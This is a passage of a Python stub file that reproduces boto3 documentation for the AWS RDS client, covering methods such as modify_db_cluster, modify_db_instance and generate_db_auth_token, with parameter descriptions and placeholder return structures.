'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
}
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def generate_db_auth_token(DBHostname=None, Port=None, DBUsername=None, Region=None):
"""
Generates an auth token used to connect to a db with IAM credentials.
:type DBHostname: str
:param DBHostname: The hostname of the database to connect to.
:type Port: int
:param Port: The port number the database is listening on.
:type DBUsername: str
:param DBUsername: The username to log in as.
:type Region: str
:param Region: The region the database is in. If None, the client
region will be used.
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_waiter():
"""
"""
pass
def list_tags_for_resource(ResourceName=None, Filters=None):
"""
Lists all tags on an Amazon RDS resource.
For an overview on tagging an Amazon RDS resource, see Tagging Amazon RDS Resources .
See also: AWS API Documentation
Examples
This example lists information about all tags associated with the specified DB option group.
Expected Output:
:example: response = client.list_tags_for_resource(
ResourceName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
:type ResourceName: string
:param ResourceName: [REQUIRED]
The Amazon RDS resource with tags to be listed. This value is an Amazon Resource Name (ARN). For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:rtype: dict
:return: {
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
"""
pass
def modify_db_cluster(DBClusterIdentifier=None, NewDBClusterIdentifier=None, ApplyImmediately=None, BackupRetentionPeriod=None, DBClusterParameterGroupName=None, VpcSecurityGroupIds=None, Port=None, MasterUserPassword=None, OptionGroupName=None, PreferredBackupWindow=None, PreferredMaintenanceWindow=None, EnableIAMDatabaseAuthentication=None):
"""
Modify a setting for an Amazon Aurora DB cluster. You can change one or more database configuration parameters by specifying these parameters and the new values in the request. For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example changes the specified settings for the specified DB cluster.
Expected Output:
:example: response = client.modify_db_cluster(
DBClusterIdentifier='string',
NewDBClusterIdentifier='string',
ApplyImmediately=True|False,
BackupRetentionPeriod=123,
DBClusterParameterGroupName='string',
VpcSecurityGroupIds=[
'string',
],
Port=123,
MasterUserPassword='string',
OptionGroupName='string',
PreferredBackupWindow='string',
PreferredMaintenanceWindow='string',
EnableIAMDatabaseAuthentication=True|False
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The DB cluster identifier for the cluster being modified. This parameter is not case-sensitive.
Constraints:
Must be the identifier for an existing DB cluster.
Must contain from 1 to 63 alphanumeric characters or hyphens.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
:type NewDBClusterIdentifier: string
:param NewDBClusterIdentifier: The new DB cluster identifier for the DB cluster when renaming a DB cluster. This value is stored as a lowercase string.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-cluster2
:type ApplyImmediately: boolean
:param ApplyImmediately: A value that specifies whether the modifications in this request and any pending modifications are asynchronously applied as soon as possible, regardless of the PreferredMaintenanceWindow setting for the DB cluster. If this parameter is set to false , changes to the DB cluster are applied during the next maintenance window.
The ApplyImmediately parameter only affects the NewDBClusterIdentifier and MasterUserPassword values. If you set the ApplyImmediately parameter value to false, then changes to the NewDBClusterIdentifier and MasterUserPassword values are applied during the next maintenance window. All other changes are applied immediately, regardless of the value of the ApplyImmediately parameter.
Default: false
:type BackupRetentionPeriod: integer
:param BackupRetentionPeriod: The number of days for which automated backups are retained. You must specify a minimum value of 1.
Default: 1
Constraints:
Must be a value from 1 to 35
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: The name of the DB cluster parameter group to use for the DB cluster.
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds: A list of VPC security groups that the DB cluster will belong to.
(string) --
:type Port: integer
:param Port: The port number on which the DB cluster accepts connections.
Constraints: Value must be 1150-65535
Default: The same port as the original DB cluster.
:type MasterUserPassword: string
:param MasterUserPassword: The new password for the master database user. This password can contain any printable ASCII character except '/', ''', or '@'.
Constraints: Must contain from 8 to 41 characters.
:type OptionGroupName: string
:param OptionGroupName: A value that indicates that the DB cluster should be associated with the specified option group. Changing this parameter does not result in an outage except in the following case, and the change is applied during the next maintenance window unless the ApplyImmediately parameter is set to true for this request. If the parameter change results in an option group that enables OEM, this change can cause a brief (sub-second) period during which new connections are rejected but existing connections are not interrupted.
Permanent options cannot be removed from an option group. The option group cannot be removed from a DB cluster once it is associated with a DB cluster.
:type PreferredBackupWindow: string
:param PreferredBackupWindow: The daily time range during which automated backups are created if automated backups are enabled, using the BackupRetentionPeriod parameter.
Default: A 30-minute window selected at random from an 8-hour block of time per region. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Constraints:
Must be in the format hh24:mi-hh24:mi .
Times should be in Universal Coordinated Time (UTC).
Must not conflict with the preferred maintenance window.
Must be at least 30 minutes.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: The weekly time range during which system maintenance can occur, in Universal Coordinated Time (UTC).
Format: ddd:hh24:mi-ddd:hh24:mi
Default: A 30-minute window selected at random from an 8-hour block of time per region, occurring on a random day of the week. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Valid Days: Mon, Tue, Wed, Thu, Fri, Sat, Sun
Constraints: Minimum 30-minute window.
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: A Boolean value that is true to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts, and otherwise false.
Default: false
:rtype: dict
:return: {
'DBCluster': {
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
}
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def modify_db_cluster_parameter_group(DBClusterParameterGroupName=None, Parameters=None):
"""
Modifies the parameters of a DB cluster parameter group. To modify more than one parameter, submit a list of the following: ParameterName , ParameterValue , and ApplyMethod . A maximum of 20 parameters can be modified in a single request.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example immediately changes the specified setting for the specified DB cluster parameter group.
Expected Output:
:example: response = client.modify_db_cluster_parameter_group(
DBClusterParameterGroupName='string',
Parameters=[
{
'ParameterName': 'string',
'ParameterValue': 'string',
'Description': 'string',
'Source': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'MinimumEngineVersion': 'string',
'ApplyMethod': 'immediate'|'pending-reboot'
},
]
)
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: [REQUIRED]
The name of the DB cluster parameter group to modify.
:type Parameters: list
:param Parameters: [REQUIRED]
A list of parameters in the DB cluster parameter group to modify.
(dict) --This data type is used as a request parameter in the ModifyDBParameterGroup and ResetDBParameterGroup actions.
This data type is used as a response element in the DescribeEngineDefaultParameters and DescribeDBParameters actions.
ParameterName (string) --Specifies the name of the parameter.
ParameterValue (string) --Specifies the value of the parameter.
Description (string) --Provides a description of the parameter.
Source (string) --Indicates the source of the parameter value.
ApplyType (string) --Specifies the engine specific parameters type.
DataType (string) --Specifies the valid data type for the parameter.
AllowedValues (string) --Specifies the valid range of values for the parameter.
IsModifiable (boolean) --Indicates whether (true ) or not (false ) the parameter can be modified. Some parameters have security or operational implications that prevent them from being changed.
MinimumEngineVersion (string) --The earliest engine version to which the parameter can apply.
ApplyMethod (string) --Indicates when to apply parameter updates.
:rtype: dict
:return: {
'DBClusterParameterGroupName': 'string'
}
:returns:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
"""
pass
def modify_db_cluster_snapshot_attribute(DBClusterSnapshotIdentifier=None, AttributeName=None, ValuesToAdd=None, ValuesToRemove=None):
"""
Adds an attribute and values to, or removes an attribute and values from, a manual DB cluster snapshot.
To share a manual DB cluster snapshot with other AWS accounts, specify restore as the AttributeName and use the ValuesToAdd parameter to add a list of IDs of the AWS accounts that are authorized to restore the manual DB cluster snapshot. Use the value all to make the manual DB cluster snapshot public, which means that it can be copied or restored by all AWS accounts. Do not add the all value for any manual DB cluster snapshots that contain private information that you don't want available to all AWS accounts. If a manual DB cluster snapshot is encrypted, it can be shared, but only by specifying a list of authorized AWS account IDs for the ValuesToAdd parameter. You can't use all as a value for that parameter in this case.
To view which AWS accounts have access to copy or restore a manual DB cluster snapshot, or whether a manual DB cluster snapshot public or private, use the DescribeDBClusterSnapshotAttributes API action.
See also: AWS API Documentation
Examples
The following example gives two AWS accounts access to a manual DB cluster snapshot and ensures that the DB cluster snapshot is private by removing the value "all".
Expected Output:
:example: response = client.modify_db_cluster_snapshot_attribute(
DBClusterSnapshotIdentifier='string',
AttributeName='string',
ValuesToAdd=[
'string',
],
ValuesToRemove=[
'string',
]
)
:type DBClusterSnapshotIdentifier: string
:param DBClusterSnapshotIdentifier: [REQUIRED]
The identifier for the DB cluster snapshot to modify the attributes for.
:type AttributeName: string
:param AttributeName: [REQUIRED]
The name of the DB cluster snapshot attribute to modify.
To manage authorization for other AWS accounts to copy or restore a manual DB cluster snapshot, set this value to restore .
:type ValuesToAdd: list
:param ValuesToAdd: A list of DB cluster snapshot attributes to add to the attribute specified by AttributeName .
To authorize other AWS accounts to copy or restore a manual DB cluster snapshot, set this list to include one or more AWS account IDs, or all to make the manual DB cluster snapshot restorable by any AWS account. Do not add the all value for any manual DB cluster snapshots that contain private information that you don't want available to all AWS accounts.
(string) --
:type ValuesToRemove: list
:param ValuesToRemove: A list of DB cluster snapshot attributes to remove from the attribute specified by AttributeName .
To remove authorization for other AWS accounts to copy or restore a manual DB cluster snapshot, set this list to include one or more AWS account identifiers, or all to remove authorization for any AWS account to copy or restore the DB cluster snapshot. If you specify all , an AWS account whose account ID is explicitly added to the restore attribute can still copy or restore a manual DB cluster snapshot.
(string) --
:rtype: dict
:return: {
'DBClusterSnapshotAttributesResult': {
'DBClusterSnapshotIdentifier': 'string',
'DBClusterSnapshotAttributes': [
{
'AttributeName': 'string',
'AttributeValues': [
'string',
]
},
]
}
}
:returns:
(string) --
"""
pass
def modify_db_instance(DBInstanceIdentifier=None, AllocatedStorage=None, DBInstanceClass=None, DBSubnetGroupName=None, DBSecurityGroups=None, VpcSecurityGroupIds=None, ApplyImmediately=None, MasterUserPassword=None, DBParameterGroupName=None, BackupRetentionPeriod=None, PreferredBackupWindow=None, PreferredMaintenanceWindow=None, MultiAZ=None, EngineVersion=None, AllowMajorVersionUpgrade=None, AutoMinorVersionUpgrade=None, LicenseModel=None, Iops=None, OptionGroupName=None, NewDBInstanceIdentifier=None, StorageType=None, TdeCredentialArn=None, TdeCredentialPassword=None, CACertificateIdentifier=None, Domain=None, CopyTagsToSnapshot=None, MonitoringInterval=None, DBPortNumber=None, PubliclyAccessible=None, MonitoringRoleArn=None, DomainIAMRoleName=None, PromotionTier=None, EnableIAMDatabaseAuthentication=None):
"""
Modifies settings for a DB instance. You can change one or more database configuration parameters by specifying these parameters and the new values in the request.
See also: AWS API Documentation
Examples
This example immediately changes the specified settings for the specified DB instance.
Expected Output:
:example: response = client.modify_db_instance(
DBInstanceIdentifier='string',
AllocatedStorage=123,
DBInstanceClass='string',
DBSubnetGroupName='string',
DBSecurityGroups=[
'string',
],
VpcSecurityGroupIds=[
'string',
],
ApplyImmediately=True|False,
MasterUserPassword='string',
DBParameterGroupName='string',
BackupRetentionPeriod=123,
PreferredBackupWindow='string',
PreferredMaintenanceWindow='string',
MultiAZ=True|False,
EngineVersion='string',
AllowMajorVersionUpgrade=True|False,
AutoMinorVersionUpgrade=True|False,
LicenseModel='string',
Iops=123,
OptionGroupName='string',
NewDBInstanceIdentifier='string',
StorageType='string',
TdeCredentialArn='string',
TdeCredentialPassword='string',
CACertificateIdentifier='string',
Domain='string',
CopyTagsToSnapshot=True|False,
MonitoringInterval=123,
DBPortNumber=123,
PubliclyAccessible=True|False,
MonitoringRoleArn='string',
DomainIAMRoleName='string',
PromotionTier=123,
EnableIAMDatabaseAuthentication=True|False
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The DB instance identifier. This value is stored as a lowercase string.
Constraints:
Must be the identifier for an existing DB instance
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type AllocatedStorage: integer
:param AllocatedStorage: The new storage capacity of the RDS instance. Changing this setting does not result in an outage and the change is applied during the next maintenance window unless ApplyImmediately is set to true for this request.
MySQL
Default: Uses existing setting
Valid Values: 5-6144
Constraints: Value supplied must be at least 10% greater than the current value. Values that are not at least 10% greater than the existing value are rounded up so that they are 10% greater than the current value.
Type: Integer
MariaDB
Default: Uses existing setting
Valid Values: 5-6144
Constraints: Value supplied must be at least 10% greater than the current value. Values that are not at least 10% greater than the existing value are rounded up so that they are 10% greater than the current value.
Type: Integer
PostgreSQL
Default: Uses existing setting
Valid Values: 5-6144
Constraints: Value supplied must be at least 10% greater than the current value. Values that are not at least 10% greater than the existing value are rounded up so that they are 10% greater than the current value.
Type: Integer
Oracle
Default: Uses existing setting
Valid Values: 10-6144
Constraints: Value supplied must be at least 10% greater than the current value. Values that are not at least 10% greater than the existing value are rounded up so that they are 10% greater than the current value.
SQL Server
Cannot be modified.
If you choose to migrate your DB instance from using standard storage to using Provisioned IOPS, or from using Provisioned IOPS to using standard storage, the process can take time. The duration of the migration depends on several factors such as database load, storage size, storage type (standard or Provisioned IOPS), amount of IOPS provisioned (if any), and the number of prior scale storage operations. Typical migration times are under 24 hours, but the process can take up to several days in some cases. During the migration, the DB instance will be available for use, but might experience performance degradation. While the migration takes place, nightly backups for the instance will be suspended. No other Amazon RDS operations can take place for the instance, including modifying the instance, rebooting the instance, deleting the instance, creating a Read Replica for the instance, and creating a DB snapshot of the instance.
:type DBInstanceClass: string
:param DBInstanceClass: The new compute and memory capacity of the DB instance. To determine the instance classes that are available for a particular DB engine, use the DescribeOrderableDBInstanceOptions action. Note that not all instance classes are available in all regions for all DB engines.
Passing a value for this setting causes an outage during the change and is applied during the next maintenance window, unless ApplyImmediately is specified as true for this request.
Default: Uses existing setting
Valid Values: db.t1.micro | db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.xlarge | db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
:type DBSubnetGroupName: string
:param DBSubnetGroupName: The new DB subnet group for the DB instance. You can use this parameter to move your DB instance to a different VPC. If your DB instance is not in a VPC, you can also use this parameter to move your DB instance into a VPC. For more information, see Updating the VPC for a DB Instance .
Changing the subnet group causes an outage during the change. The change is applied during the next maintenance window, unless you specify true for the ApplyImmediately parameter.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens.
Example: mySubnetGroup
:type DBSecurityGroups: list
:param DBSecurityGroups: A list of DB security groups to authorize on this DB instance. Changing this setting does not result in an outage and the change is asynchronously applied as soon as possible.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
(string) --
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds: A list of EC2 VPC security groups to authorize on this DB instance. This change is asynchronously applied as soon as possible.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
(string) --
:type ApplyImmediately: boolean
:param ApplyImmediately: Specifies whether the modifications in this request and any pending modifications are asynchronously applied as soon as possible, regardless of the PreferredMaintenanceWindow setting for the DB instance.
If this parameter is set to false , changes to the DB instance are applied during the next maintenance window. Some parameter changes can cause an outage and will be applied on the next call to RebootDBInstance , or the next failure reboot. Review the table of parameters in Modifying a DB Instance and Using the Apply Immediately Parameter to see the impact that setting ApplyImmediately to true or false has for each modified parameter and to determine when the changes will be applied.
Default: false
:type MasterUserPassword: string
:param MasterUserPassword: The new password for the DB instance master user. Can be any printable ASCII character except '/', ''', or '@'.
Changing this parameter does not result in an outage and the change is asynchronously applied as soon as possible. Between the time of the request and the completion of the request, the MasterUserPassword element exists in the PendingModifiedValues element of the operation response.
Default: Uses existing setting
Constraints: Must be 8 to 41 alphanumeric characters (MySQL, MariaDB, and Amazon Aurora), 8 to 30 alphanumeric characters (Oracle), or 8 to 128 alphanumeric characters (SQL Server).
Note
Amazon RDS API actions never return the password, so this action provides a way to regain access to a primary instance user if the password is lost. This includes restoring privileges that might have been accidentally revoked.
:type DBParameterGroupName: string
:param DBParameterGroupName: The name of the DB parameter group to apply to the DB instance. Changing this setting does not result in an outage. The parameter group name itself is changed immediately, but the actual parameter changes are not applied until you reboot the instance without failover. The db instance will NOT be rebooted automatically and the parameter changes will NOT be applied during the next maintenance window.
Default: Uses existing setting
Constraints: The DB parameter group must be in the same DB parameter group family as this DB instance.
:type BackupRetentionPeriod: integer
:param BackupRetentionPeriod: The number of days to retain automated backups. Setting this parameter to a positive number enables backups. Setting this parameter to 0 disables automated backups.
Changing this parameter can result in an outage if you change from 0 to a non-zero value or from a non-zero value to 0. These changes are applied during the next maintenance window unless the ApplyImmediately parameter is set to true for this request. If you change the parameter from one non-zero value to another non-zero value, the change is asynchronously applied as soon as possible.
Default: Uses existing setting
Constraints:
Must be a value from 0 to 35
Can be specified for a MySQL Read Replica only if the source is running MySQL 5.6
Can be specified for a PostgreSQL Read Replica only if the source is running PostgreSQL 9.3.5
Cannot be set to 0 if the DB instance is a source to Read Replicas
:type PreferredBackupWindow: string
:param PreferredBackupWindow: The daily time range during which automated backups are created if automated backups are enabled, as determined by the BackupRetentionPeriod parameter. Changing this parameter does not result in an outage and the change is asynchronously applied as soon as possible.
Constraints:
Must be in the format hh24:mi-hh24:mi
Times should be in Universal Time Coordinated (UTC)
Must not conflict with the preferred maintenance window
Must be at least 30 minutes
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: The weekly time range (in UTC) during which system maintenance can occur, which might result in an outage. Changing this parameter does not result in an outage, except in the following situation, and the change is asynchronously applied as soon as possible. If there are pending actions that cause a reboot, and the maintenance window is changed to include the current time, then changing this parameter will cause a reboot of the DB instance. If moving this window to the current time, there must be at least 30 minutes between the current time and end of the window to ensure pending changes are applied.
Default: Uses existing setting
Format: ddd:hh24:mi-ddd:hh24:mi
Valid Days: Mon | Tue | Wed | Thu | Fri | Sat | Sun
Constraints: Must be at least 30 minutes
:type MultiAZ: boolean
:param MultiAZ: Specifies if the DB instance is a Multi-AZ deployment. Changing this parameter does not result in an outage and the change is applied during the next maintenance window unless the ApplyImmediately parameter is set to true for this request.
Constraints: Cannot be specified if the DB instance is a Read Replica.
:type EngineVersion: string
:param EngineVersion: The version number of the database engine to upgrade to. Changing this parameter results in an outage and the change is applied during the next maintenance window unless the ApplyImmediately parameter is set to true for this request.
For major version upgrades, if a non-default DB parameter group is currently in use, a new DB parameter group in the DB parameter group family for the new engine version must be specified. The new DB parameter group can be the default for that DB parameter group family.
For a list of valid engine versions, see CreateDBInstance .
:type AllowMajorVersionUpgrade: boolean
:param AllowMajorVersionUpgrade: Indicates that major version upgrades are allowed. Changing this parameter does not result in an outage and the change is asynchronously applied as soon as possible.
Constraints: This parameter must be set to true when specifying a value for the EngineVersion parameter that is a different major version than the DB instance's current version.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade: Indicates that minor version upgrades will be applied automatically to the DB instance during the maintenance window. Changing this parameter does not result in an outage except in the following case and the change is asynchronously applied as soon as possible. An outage will result if this parameter is set to true during the maintenance window, and a newer minor version is available, and RDS has enabled auto patching for that engine version.
:type LicenseModel: string
:param LicenseModel: The license model for the DB instance.
Valid values: license-included | bring-your-own-license | general-public-license
:type Iops: integer
:param Iops: The new Provisioned IOPS (I/O operations per second) value for the RDS instance. Changing this setting does not result in an outage and the change is applied during the next maintenance window unless the ApplyImmediately parameter is set to true for this request.
Default: Uses existing setting
Constraints: Value supplied must be at least 10% greater than the current value. Values that are not at least 10% greater than the existing value are rounded up so that they are 10% greater than the current value. If you are migrating from Provisioned IOPS to standard storage, set this value to 0. The DB instance will require a reboot for the change in storage type to take effect.
SQL Server
Setting the IOPS value for the SQL Server database engine is not supported.
Type: Integer
If you choose to migrate your DB instance from using standard storage to using Provisioned IOPS, or from using Provisioned IOPS to using standard storage, the process can take time. The duration of the migration depends on several factors such as database load, storage size, storage type (standard or Provisioned IOPS), amount of IOPS provisioned (if any), and the number of prior scale storage operations. Typical migration times are under 24 hours, but the process can take up to several days in some cases. During the migration, the DB instance will be available for use, but might experience performance degradation. While the migration takes place, nightly backups for the instance will be suspended. No other Amazon RDS operations can take place for the instance, including modifying the instance, rebooting the instance, deleting the instance, creating a Read Replica for the instance, and creating a DB snapshot of the instance.
:type OptionGroupName: string
:param OptionGroupName: Indicates that the DB instance should be associated with the specified option group. Changing this parameter does not result in an outage except in the following case and the change is applied during the next maintenance window unless the ApplyImmediately parameter is set to true for this request. If the parameter change results in an option group that enables OEM, this change can cause a brief (sub-second) period during which new connections are rejected but existing connections are not interrupted.
Permanent options, such as the TDE option for Oracle Advanced Security TDE, cannot be removed from an option group, and that option group cannot be removed from a DB instance once it is associated with a DB instance
:type NewDBInstanceIdentifier: string
:param NewDBInstanceIdentifier: The new DB instance identifier for the DB instance when renaming a DB instance. When you change the DB instance identifier, an instance reboot will occur immediately if you set Apply Immediately to true, or will occur during the next maintenance window if Apply Immediately to false. This value is stored as a lowercase string.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type StorageType: string
:param StorageType: Specifies the storage type to be associated with the DB instance.
Valid values: standard | gp2 | io1
If you specify io1 , you must also include a value for the Iops parameter.
Default: io1 if the Iops parameter is specified; otherwise standard
:type TdeCredentialArn: string
:param TdeCredentialArn: The ARN from the Key Store with which to associate the instance for TDE encryption.
:type TdeCredentialPassword: string
:param TdeCredentialPassword: The password for the given ARN from the Key Store in order to access the device.
:type CACertificateIdentifier: string
:param CACertificateIdentifier: Indicates the certificate that needs to be associated with the instance.
:type Domain: string
:param Domain: The Active Directory Domain to move the instance to. Specify none to remove the instance from its current domain. The domain must be created prior to this operation. Currently only a Microsoft SQL Server instance can be created in a Active Directory Domain.
:type CopyTagsToSnapshot: boolean
:param CopyTagsToSnapshot: True to copy all tags from the DB instance to snapshots of the DB instance; otherwise false. The default is false.
:type MonitoringInterval: integer
:param MonitoringInterval: The interval, in seconds, between points when Enhanced Monitoring metrics are collected for the DB instance. To disable collecting Enhanced Monitoring metrics, specify 0. The default is 0.
If MonitoringRoleArn is specified, then you must also set MonitoringInterval to a value other than 0.
Valid Values: 0, 1, 5, 10, 15, 30, 60
:type DBPortNumber: integer
:param DBPortNumber: The port number on which the database accepts connections.
The value of the DBPortNumber parameter must not match any of the port values specified for options in the option group for the DB instance.
Your database will restart when you change the DBPortNumber value regardless of the value of the ApplyImmediately parameter.
MySQL
Default: 3306
Valid Values: 1150-65535
MariaDB
Default: 3306
Valid Values: 1150-65535
PostgreSQL
Default: 5432
Valid Values: 1150-65535
Type: Integer
Oracle
Default: 1521
Valid Values: 1150-65535
SQL Server
Default: 1433
Valid Values: 1150-65535 except for 1434 , 3389 , 47001 , 49152 , and 49152 through 49156 .
Amazon Aurora
Default: 3306
Valid Values: 1150-65535
:type PubliclyAccessible: boolean
:param PubliclyAccessible: Boolean value that indicates if the DB instance has a publicly resolvable DNS name. Set to True to make the DB instance Internet-facing with a publicly resolvable DNS name, which resolves to a public IP address. Set to False to make the DB instance internal with a DNS name that resolves to a private IP address.
PubliclyAccessible only applies to DB instances in a VPC. The DB instance must be part of a public subnet and PubliclyAccessible must be true in order for it to be publicly accessible.
Changes to the PubliclyAccessible parameter are applied immediately regardless of the value of the ApplyImmediately parameter.
Default: false
:type MonitoringRoleArn: string
:param MonitoringRoleArn: The ARN for the IAM role that permits RDS to send enhanced monitoring metrics to CloudWatch Logs. For example, arn:aws:iam:123456789012:role/emaccess . For information on creating a monitoring role, go to To create an IAM role for Amazon RDS Enhanced Monitoring .
If MonitoringInterval is set to a value other than 0, then you must supply a MonitoringRoleArn value.
:type DomainIAMRoleName: string
:param DomainIAMRoleName: The name of the IAM role to use when making API calls to the Directory Service.
:type PromotionTier: integer
:param PromotionTier: A value that specifies the order in which an Aurora Replica is promoted to the primary instance after a failure of the existing primary instance. For more information, see Fault Tolerance for an Aurora DB Cluster .
Default: 1
Valid Values: 0 - 15
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
You can enable IAM database authentication for the following database engines
For MySQL 5.6, minor version 5.6.34 or higher
For MySQL 5.7, minor version 5.7.16 or higher
Default: false
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
